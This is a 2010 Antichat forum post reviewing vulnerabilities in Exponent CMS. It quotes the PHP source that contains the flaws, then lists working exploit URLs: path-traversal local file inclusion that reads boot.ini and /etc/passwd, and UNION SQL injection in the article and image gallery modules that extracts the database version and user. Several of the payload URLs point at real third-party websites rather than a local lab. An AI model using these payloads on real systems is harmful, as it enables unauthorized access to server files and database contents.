Форум АНТИЧАТ - [ Обзор уязвимостей Exponent CMS ]

02.02.2010, 21:59

nikp

Reservists Of Antichat - Level 6

Регистрация: 19.09.2008

Сообщений: 127

Провел на форуме:
835386

Репутация: 1463

index.php

PHP код:


		
			
...

    $page = exponent_theme_getTheme();



    // If we are in a printer friendly request then we need to change to our printer friendly subtheme

    if (PRINTER_FRIENDLY == 1) {

        exponent_sessions_set("uilevel",0);

        $pftheme = exponent_theme_getPrinterFriendlyTheme();      // get the printer friendly theme 

        $page = $pftheme == null ? $page : $pftheme;        // if there was no theme found then just use the current subtheme

    }

 

    $base_i18n = exponent_lang_loadFile('index.php');



    if (is_readable($page)) {

        if (!exponent_javascript_inAjaxAction()) {

    include_once($page);

themes/coolwatertheme/index.php

PHP код:


		
			
    <?php exponent_theme_main(); ?>

subsystems/theme.php

PHP код:


		
			
function exponent_theme_main() {

    global $db, $user;



    echo show_msg_queue();

    if ((!defined("SOURCE_SELECTOR") || SOURCE_SELECTOR == 1) && (!defined("CONTENT_SELECTOR") || CONTENT_SELECTOR == 1)) {

        $last_section = exponent_sessions_get("last_section");

        $section = $db->selectObject("section","id=".$last_section);

        // View authorization will be taken care of by the runAction and mainContainer functions

        if (exponent_theme_inAction()) {

            exponent_theme_runAction();



function exponent_theme_runAction() {



    if (exponent_theme_inAction()) {

        if (!AUTHORIZED_SECTION) {

            echo SITE_403_HTML;

        //    return;

        }

        if (exponent_sessions_isset("themeopt_override")) {

            $config = exponent_sessions_get("themeopt_override");

            echo "<a class='mngmntlink sitetemplate_mngmntlink' href='".$config['mainpage']."'>".$config['backlinktext']."</a><br /><br />";

        }



        if (isset($_REQUEST['controller'])) {

                      echo renderAction($_REQUEST); 

                } else {

            if ($_REQUEST['action'] == 'index') {

                $view = empty($_REQUEST['view']) ? 'Default' : $_REQUEST['view'];            

                $title = empty($_REQUEST['title']) ? '' : $_REQUEST['title'];    

                $src = empty($_REQUEST['src']) ? null : $_REQUEST['src'];        

                exponent_theme_showModule($_REQUEST['module'], $view, $title, $src);

                return true;

            }



            global $db, $user;



            $loc = null;

            $loc->mod = $_REQUEST['module'];

            $loc->src = (isset($_REQUEST['src']) ? $_REQUEST['src'] : "");

            $loc->int = (isset($_REQUEST['int']) ? $_REQUEST['int'] : "");



            $actfile = "/" . $_REQUEST['module'] . "/actions/" . $_REQUEST['action'] . ".php";

            if (isset($_REQUEST['_common'])) $actfile = "/common/actions/" . $_REQUEST['action'] . ".php";



            if (is_readable(BASE."themes/".DISPLAY_THEME_REAL."/modules".$actfile)) {

                include_once(BASE."themes/".DISPLAY_THEME_REAL."/modules".$actfile);

            } elseif (is_readable(BASE.'modules/'.$actfile)) {

                include_once(BASE.'modules/'.$actfile);

LFI
mq=off
http://localhost/?action=../../../../../../../../boot.ini%00&module=loginmodule
http://localhost/?action=login&module=../../../../../../../../boot.ini%00
http://demo.demolabo.com/exponent/en/?action=../../../../../../../../../../../etc/passwd%00&module=loginmodule

---------------

modules/articlemodule/actions/view_article.php

PHP код:


		
			
if (!defined("EXPONENT")) exit("");

    $article = null;

    if (isset($_GET['id'])) {

        $article = $db->selectObject("article","id=".$_GET['id']);

subsystems/database/mysqli.php

PHP код:


		
			
    function selectObjects($table, $where = null,$orderby = null) {

        if ($where == null) $where = "1";

        if ($orderby == null) $orderby = '';

        else $orderby = "ORDER BY " . $orderby;



        $res = @mysqli_query($this->connection, "SELECT * FROM `" . $this->prefix . "$table` WHERE $where $orderby");

        if ($res == null) return array();

        $objects = array();

        for ($i = 0; $i < mysqli_num_rows($res); $i++) $objects[] = mysqli_fetch_object($res);

        return $objects;

    }

SQL
http://localhost/index.php?action=view_article&module=articlemodule &id=-1+union+select+1,2,3,version(),user(),6+--+
http://www.exponentcms.org/index.php?action=view_article&module=articlemodule &id=-1+union+select+1,2,3,version(),user(),6+--+
(на exponentcms.org оперативно закрыли sql, сначала выдавали надпись, типа - уходи хакер, потом сменили на bad query! Поэтому ниже еще один УРЛ для проверки.)
http://rickandbernie.net/?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,version(),user(),6+--+
----------------
modules/imagegallerymodule/actions/image_to_panel.php

PHP код:


		
			
if (!defined("EXPONENT")) exit("");



$image = null;

if (isset($_GET['id'])) {

    $image = $db->selectObject("imagegallery_image","id=".$_GET['id']);

}

    

if ($image) {

    $image->file = $db->selectObject("file","id=".$image->file_id);    

    echo json_encode($image);

} else {

    echo SITE_404_HTML;

}

SQL
http://localhost/index.php?action=image_to_panel&module=imagegaller ymodule&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11+--+

Последний раз редактировалось nikp; 03.02.2010 в 01:58..